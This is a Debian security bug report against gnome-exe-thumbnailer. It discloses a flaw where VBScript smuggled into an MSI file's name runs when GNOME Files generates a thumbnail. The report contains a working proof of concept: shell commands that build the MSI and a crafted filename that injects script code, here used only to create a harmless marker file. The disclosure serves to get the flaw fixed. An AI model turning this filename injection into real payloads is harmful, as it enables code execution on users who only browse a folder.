Package: gnome-exe-thumbnailer Version: 0.9.4-2 Severity: grave Tags: security Justification: user security hole
Dear Maintainer, the following PoC is copied verbatim from my post about the parsing issue: http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html Proof of Concept Install Dependencies On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer. If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host. Create MSI Files Create a file named poc.xml with the following content: <?xml version="1.0" encoding="utf-8"?> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi";> <Product Version="1.0"/> </Wix> Execute the following Bourne Shell code: wixl -o poc.msi poc.xml cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi" Trigger Execution Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear. *** End of the template - remove these template lines *** -- System Information: Debian Release: 9.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: sysvinit (via /sbin/init) Versions of packages gnome-exe-thumbnailer depends on: ii icoutils 0.31.2-1.1 ii imagemagick 8:6.9.7.4+dfsg-11 ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11 ii libglib2.0-bin 2.50.3-2 Versions of packages gnome-exe-thumbnailer recommends: pn wine <none> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none> gnome-exe-thumbnailer suggests no packages. -- no debconf information
